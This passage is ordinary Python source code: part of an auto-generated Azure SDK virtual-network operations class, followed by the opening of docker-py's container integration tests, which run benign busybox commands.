if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'VirtualNetwork')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, virtual_network_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a virtual network in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param parameters: Parameters supplied to the create or update virtual
network operation
:type parameters:
~azure.mgmt.network.v2017_10_01.models.VirtualNetwork
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VirtualNetwork or
ClientRawResponse<VirtualNetwork> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
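# Illustrative sketch (assumes an authenticated NetworkManagementClient whose
# `virtual_networks` attribute is an instance of this operations class; all
# names and address ranges are hypothetical):
#
#     poller = network_client.virtual_networks.create_or_update(
#         'my_resource_group', 'my_vnet',
#         {'location': 'westus',
#          'address_space': {'address_prefixes': ['10.0.0.0/16']}})
#     vnet = poller.result()  # blocks until the long-running operation finishes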
def _update_tags_initial(
self, resource_group_name, virtual_network_name, tags=None, custom_headers=None, raw=False, **operation_config):
parameters = models.TagsObject(tags=tags)
# Construct URL
url = self.update_tags.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'TagsObject')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_tags(
self, resource_group_name, virtual_network_name, tags=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Updates a virtual network tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns VirtualNetwork or
ClientRawResponse<VirtualNetwork> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetwork', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all virtual networks in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of VirtualNetwork
:rtype:
~azure.mgmt.network.v2017_10_01.models.VirtualNetworkPaged[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualNetworks'}
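# Illustrative usage sketch (assumes the same hypothetical `network_client`
# as above). The returned VirtualNetworkPaged object is a lazy iterator that
# follows `next_link` to fetch further pages on demand.
#
#     for vnet in network_client.virtual_networks.list_all():
#         print(vnet.name, vnet.location)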
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all virtual networks in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator-like instance of VirtualNetwork
:rtype:
~azure.mgmt.network.v2017_10_01.models.VirtualNetworkPaged[~azure.mgmt.network.v2017_10_01.models.VirtualNetwork]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks'}
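# Illustrative usage sketch (same hypothetical `network_client`): scoping to a
# single resource group works the same way as list_all above.
#
#     for vnet in network_client.virtual_networks.list('my-rg'):
#         print(vnet.name)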
def check_ip_address_availability(
self, resource_group_name, virtual_network_name, ip_address=None, custom_headers=None, raw=False, **operation_config):
"""Checks whether a private IP address is available for use.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param ip_address: The private IP address to be verified.
:type ip_address: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: IPAddressAvailabilityResult or ClientRawResponse if raw==True
:rtype:
~azure.mgmt.network.v2017_10_01.models.IPAddressAvailabilityResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_ip_address_availability.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if ip_address is not None:
query_parameters['ipAddress'] = self._serialize.query("ip_address", ip_address, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('IPAddressAvailabilityResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_ip_address_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/CheckIPAddressAvailability'}
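# Illustrative usage sketch (assumes the hypothetical `network_client` from
# the earlier examples). IPAddressAvailabilityResult exposes `available` and
# `available_ip_addresses`.
#
#     result = network_client.virtual_networks.check_ip_address_availability(
#         'my-rg', 'my-vnet', ip_address='10.0.0.4')
#     if not result.available:
#         print('In use; suggested alternatives:', result.available_ip_addresses)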
def list_usage(
self, resource_group_name, virtual_network_name, custom_headers=None, raw=False, **operation_config):
"""Lists usage stats.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator-like instance of VirtualNetworkUsage
:rtype:
~azure.mgmt.network.v2017_10_01.models.VirtualNetworkUsagePaged[~azure.mgmt.network.v2017_10_01.models.VirtualNetworkUsage]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_usage.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.VirtualNetworkUsagePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.VirtualNetworkUsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_usage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/usages'}
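# Illustrative usage sketch (same hypothetical `network_client`): iterate the
# per-subnet usage figures returned by list_usage.
#
#     for usage in network_client.virtual_networks.list_usage('my-rg', 'my-vnet'):
#         print(usage.name.value, usage.current_value, '/', usage.limit)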
|
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import contextlib
import json
import io
import os
import shutil
import signal
import socket
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import pytest
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
import docker
from docker.errors import APIError
from docker.utils import kwargs_from_env
from .base import requires_api_version
from .test import Cleanup
# FIXME: missing tests for
# export; history; insert; port; push; tag; get; load; stats
warnings.simplefilter('error')
compare_version = docker.utils.compare_version
EXEC_DRIVER = []
def exec_driver_is_native():
global EXEC_DRIVER
if not EXEC_DRIVER:
c = docker_client()
EXEC_DRIVER = c.info()['ExecutionDriver']
c.close()
return EXEC_DRIVER.startswith('native')
def docker_client(**kwargs):
return docker.Client(**docker_client_kwargs(**kwargs))
def docker_client_kwargs(**kwargs):
client_kwargs = kwargs_from_env(assert_hostname=False)
client_kwargs.update(kwargs)
return client_kwargs
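# Illustrative usage sketch: the two helpers above build a docker.Client from
# the environment (DOCKER_HOST, DOCKER_CERT_PATH, DOCKER_TLS_VERIFY) via
# kwargs_from_env, so ad-hoc use outside the test classes looks like:
#
#     c = docker_client(timeout=60)
#     try:
#         print(c.version()['ApiVersion'])
#     finally:
#         c.close()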
def setup_module():
c = docker_client()
c.pull('busybox')
c.close()
class BaseTestCase(unittest.TestCase):
tmp_imgs = []
tmp_containers = []
tmp_folders = []
tmp_volumes = []
def setUp(self):
if six.PY2:
self.assertRegex = self.assertRegexpMatches
self.assertCountEqual = self.assertItemsEqual
self.client = docker_client(timeout=60)
self.tmp_imgs = []
self.tmp_containers = []
self.tmp_folders = []
self.tmp_volumes = []
def tearDown(self):
for img in self.tmp_imgs:
try:
self.client.remove_image(img)
except docker.errors.APIError:
pass
for container in self.tmp_containers:
try:
self.client.stop(container, timeout=1)
self.client.remove_container(container)
except docker.errors.APIError:
pass
for folder in self.tmp_folders:
shutil.rmtree(folder)
for volume in self.tmp_volumes:
try:
self.client.remove_volume(volume)
except docker.errors.APIError:
pass
self.client.close()
#########################
# INFORMATION TESTS #
#########################
class TestVersion(BaseTestCase):
def runTest(self):
res = self.client.version()
self.assertIn('GoVersion', res)
self.assertIn('Version', res)
self.assertEqual(len(res['Version'].split('.')), 3)
class TestInfo(BaseTestCase):
def runTest(self):
res = self.client.info()
self.assertIn('Containers', res)
self.assertIn('Images', res)
self.assertIn('Debug', res)
class TestSearch(BaseTestCase):
def runTest(self):
self.client = docker_client(timeout=10)
res = self.client.search('busybox')
self.assertTrue(len(res) >= 1)
base_img = [x for x in res if x['name'] == 'busybox']
self.assertEqual(len(base_img), 1)
self.assertIn('description', base_img[0])
###################
# LISTING TESTS #
###################
class TestImages(BaseTestCase):
def runTest(self):
res1 = self.client.images(all=True)
self.assertIn('Id', res1[0])
res10 = res1[0]
self.assertIn('Created', res10)
self.assertIn('RepoTags', res10)
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
self.assertEqual(len(distinct), self.client.info()['Images'])
class TestImageIds(BaseTestCase):
def runTest(self):
res1 = self.client.images(quiet=True)
self.assertEqual(type(res1[0]), six.text_type)
class TestListContainers(BaseTestCase):
def runTest(self):
res0 = self.client.containers(all=True)
size = len(res0)
res1 = self.client.create_container('busybox:latest', 'true')
self.assertIn('Id', res1)
self.client.start(res1['Id'])
self.tmp_containers.append(res1['Id'])
res2 = self.client.containers(all=True)
self.assertEqual(size + 1, len(res2))
retrieved = [x for x in res2 if x['Id'].startswith(res1['Id'])]
self.assertEqual(len(retrieved), 1)
retrieved = retrieved[0]
self.assertIn('Command', retrieved)
self.assertEqual(retrieved['Command'], six.text_type('true'))
self.assertIn('Image', retrieved)
self.assertRegex(retrieved['Image'], r'busybox:.*')
self.assertIn('Status', retrieved)
#####################
# CONTAINER TESTS #
#####################
class TestCreateContainer(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
class TestCreateContainerWithBinds(BaseTestCase):
def runTest(self):
mount_dest = '/mnt'
mount_origin = tempfile.mkdtemp()
self.tmp_folders.append(mount_origin)
filename = 'shared.txt'
shared_file = os.path.join(mount_origin, filename)
binds = {
mount_origin: {
'bind': mount_dest,
'ro': False,
},
}
with open(shared_file, 'w'):
container = self.client.create_container(
'busybox',
['ls', mount_dest], volumes={mount_dest: {}},
host_config=self.client.create_host_config(
binds=binds, network_mode='none'
)
)
container_id = container['Id']
self.client.start(container_id)
self.tmp_containers.append(container_id)
exitcode = self.client.wait(container_id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(container_id)
os.unlink(shared_file)
if six.PY3:
logs = logs.decode('utf-8')
self.assertIn(filename, logs)
# FIXME: format changes in API version >= 1.20
inspect_data = self.client.inspect_container(container_id)
self.assertIn('Volumes', inspect_data)
self.assertIn(mount_dest, inspect_data['Volumes'])
self.assertEqual(mount_origin, inspect_data['Volumes'][mount_dest])
self.assertIn(mount_dest, inspect_data['VolumesRW'])
self.assertTrue(inspect_data['VolumesRW'][mount_dest])
class TestCreateContainerWithRoBinds(BaseTestCase):
def runTest(self):
mount_dest = '/mnt'
mount_origin = tempfile.mkdtemp()
self.tmp_folders.append(mount_origin)
filename = 'shared.txt'
shared_file = os.path.join(mount_origin, filename)
binds = {
mount_origin: {
'bind': mount_dest,
'ro': True,
},
}
with open(shared_file, 'w'):
container = self.client.create_container(
'busybox',
['ls', mount_dest], volumes={mount_dest: {}},
host_config=self.client.create_host_config(
binds=binds, network_mode='none'
)
)
container_id = container['Id']
self.client.start(container_id)
self.tmp_containers.append(container_id)
exitcode = self.client.wait(container_id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(container_id)
os.unlink(shared_file)
if six.PY3:
logs = logs.decode('utf-8')
self.assertIn(filename, logs)
# FIXME: format changes in API version >= 1.20
inspect_data = self.client.inspect_container(container_id)
self.assertIn('Volumes', inspect_data)
self.assertIn(mount_dest, inspect_data['Volumes'])
self.assertEqual(mount_origin, inspect_data['Volumes'][mount_dest])
self.assertIn(mount_dest, inspect_data['VolumesRW'])
self.assertFalse(inspect_data['VolumesRW'][mount_dest])
@requires_api_version('1.20')
class CreateContainerWithGroupAddTest(BaseTestCase):
def test_group_id_ints(self):
container = self.client.create_container(
'busybox', 'id -G',
host_config=self.client.create_host_config(group_add=[1000, 1001])
)
self.tmp_containers.append(container)
self.client.start(container)
self.client.wait(container)
logs = self.client.logs(container)
if six.PY3:
logs = logs.decode('utf-8')
groups = logs.strip().split(' ')
self.assertIn('1000', groups)
self.assertIn('1001', groups)
def test_group_id_strings(self):
container = self.client.create_container(
'busybox', 'id -G', host_config=self.client.create_host_config(
group_add=['1000', '1001']
)
)
self.tmp_containers.append(container)
self.client.start(container)
self.client.wait(container)
logs = self.client.logs(container)
if six.PY3:
logs = logs.decode('utf-8')
groups = logs.strip().split(' ')
self.assertIn('1000', groups)
self.assertIn('1001', groups)
class CreateContainerWithLogConfigTest(BaseTestCase):
def test_valid_log_driver_and_log_opt(self):
log_config = docker.utils.LogConfig(
type='json-file',
config={'max-file': '100'}
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
self.tmp_containers.append(container['Id'])
self.client.start(container)
info = self.client.inspect_container(container)
container_log_config = info['HostConfig']['LogConfig']
self.assertEqual(container_log_config['Type'], log_config.type)
self.assertEqual(container_log_config['Config'], log_config.config)
def test_invalid_log_driver_raises_exception(self):
log_config = docker.utils.LogConfig(
type='asdf-nope',
config={}
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
expected_msg = "logger: no log driver named 'asdf-nope' is registered"
with pytest.raises(APIError) as excinfo:
# raises an internal server error 500
self.client.start(container)
assert expected_msg in str(excinfo.value)
@pytest.mark.skipif(True,
reason="https://github.com/docker/docker/issues/15633")
def test_valid_no_log_driver_specified(self):
log_config = docker.utils.LogConfig(
type="",
config={'max-file': '100'}
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
self.tmp_containers.append(container['Id'])
self.client.start(container)
info = self.client.inspect_container(container)
container_log_config = info['HostConfig']['LogConfig']
self.assertEqual(container_log_config['Type'], "json-file")
self.assertEqual(container_log_config['Config'], log_config.config)
def test_valid_no_config_specified(self):
log_config = docker.utils.LogConfig(
type="json-file",
config=None
)
container = self.client.create_container(
'busybox', ['true'],
host_config=self.client.create_host_config(log_config=log_config)
)
self.tmp_containers.append(container['Id'])
self.client.start(container)
info = self.client.inspect_container(container)
container_log_config = info['HostConfig']['LogConfig']
self.assertEqual(container_log_config['Type'], "json-file")
self.assertEqual(container_log_config['Config'], {})
class TestCreateContainerReadOnlyFs(BaseTestCase):
def runTest(self):
if not exec_driver_is_native():
pytest.skip('Exec driver not native')
ctnr = self.client.create_container(
'busybox', ['mkdir', '/shrine'],
host_config=self.client.create_host_config(
read_only=True, network_mode='none'
)
)
self.assertIn('Id', ctnr)
self.tmp_containers.append(ctnr['Id'])
self.client.start(ctnr)
res = self.client.wait(ctnr)
self.assertNotEqual(res, 0)
class TestCreateContainerWithName(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true', name='foobar')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Name', inspect)
self.assertEqual('/foobar', inspect['Name'])
class TestRenameContainer(BaseTestCase):
def runTest(self):
version = self.client.version()['Version']
name = 'hong_meiling'
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.rename(res, name)
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Name', inspect)
if version == '1.5.0':
self.assertEqual(name, inspect['Name'])
else:
self.assertEqual('/{0}'.format(name), inspect['Name'])
class TestStartContainer(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.start(res['Id'])
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Config', inspect)
self.assertIn('Id', inspect)
self.assertTrue(inspect['Id'].startswith(res['Id']))
self.assertIn('Image', inspect)
self.assertIn('State', inspect)
self.assertIn('Running', inspect['State'])
if not inspect['State']['Running']:
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], 0)
class TestStartContainerWithDictInsteadOfId(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', 'true')
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.start(res)
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Config', inspect)
self.assertIn('Id', inspect)
self.assertTrue(inspect['Id'].startswith(res['Id']))
self.assertIn('Image', inspect)
self.assertIn('State', inspect)
self.assertIn('Running', inspect['State'])
if not inspect['State']['Running']:
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], 0)
class TestCreateContainerPrivileged(BaseTestCase):
def runTest(self):
res = self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
privileged=True, network_mode='none'
)
)
self.assertIn('Id', res)
self.tmp_containers.append(res['Id'])
self.client.start(res['Id'])
inspect = self.client.inspect_container(res['Id'])
self.assertIn('Config', inspect)
self.assertIn('Id', inspect)
self.assertTrue(inspect['Id'].startswith(res['Id']))
self.assertIn('Image', inspect)
self.assertIn('State', inspect)
self.assertIn('Running', inspect['State'])
if not inspect['State']['Running']:
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], 0)
# Since Nov 2013, the Privileged flag is no longer part of the
# container's config exposed via the API (safety concerns?).
#
if 'Privileged' in inspect['Config']:
self.assertEqual(inspect['Config']['Privileged'], True)
class TestWait(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', ['sleep', '3'])
id = res['Id']
self.tmp_containers.append(id)
self.client.start(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
inspect = self.client.inspect_container(id)
self.assertIn('Running', inspect['State'])
self.assertEqual(inspect['State']['Running'], False)
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], exitcode)
class TestWaitWithDictInsteadOfId(BaseTestCase):
def runTest(self):
res = self.client.create_container('busybox', ['sleep', '3'])
id = res['Id']
self.tmp_containers.append(id)
self.client.start(res)
exitcode = self.client.wait(res)
self.assertEqual(exitcode, 0)
inspect = self.client.inspect_container(res)
self.assertIn('Running', inspect['State'])
self.assertEqual(inspect['State']['Running'], False)
self.assertIn('ExitCode', inspect['State'])
self.assertEqual(inspect['State']['ExitCode'], exitcode)
class TestLogs(BaseTestCase):
def runTest(self):
snippet = 'Flowering Nights (Sakuya Iyazoi)'
container = self.client.create_container(
'busybox', 'echo {0}'.format(snippet)
)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(id)
self.assertEqual(logs, (snippet + '\n').encode(encoding='ascii'))
class TestLogsWithTailOption(BaseTestCase):
def runTest(self):
snippet = '''Line1
Line2'''
container = self.client.create_container(
'busybox', 'echo "{0}"'.format(snippet)
)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(id, tail=1)
self.assertEqual(logs, ('Line2\n').encode(encoding='ascii'))
# class TestLogsStreaming(BaseTestCase):
# def runTest(self):
# snippet = 'Flowering Nights (Sakuya Iyazoi)'
# container = self.client.create_container(
# 'busybox', 'echo {0}'.format(snippet)
# )
# id = container['Id']
# self.client.start(id)
# self.tmp_containers.append(id)
# logs = bytes() if six.PY3 else str()
# for chunk in self.client.logs(id, stream=True):
# logs += chunk
# exitcode = self.client.wait(id)
# self.assertEqual(exitcode, 0)
# self.assertEqual(logs, (snippet + '\n').encode(encoding='ascii'))
class TestLogsWithDictInsteadOfId(BaseTestCase):
def runTest(self):
snippet = 'Flowering Nights (Sakuya Iyazoi)'
container = self.client.create_container(
'busybox', 'echo {0}'.format(snippet)
)
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
exitcode = self.client.wait(id)
self.assertEqual(exitcode, 0)
logs = self.client.logs(container)
self.assertEqual(logs, (snippet + '\n').encode(encoding='ascii'))
class TestDiff(BaseTestCase):
def runTest(self):
container = self.client.create_container('busybox', ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
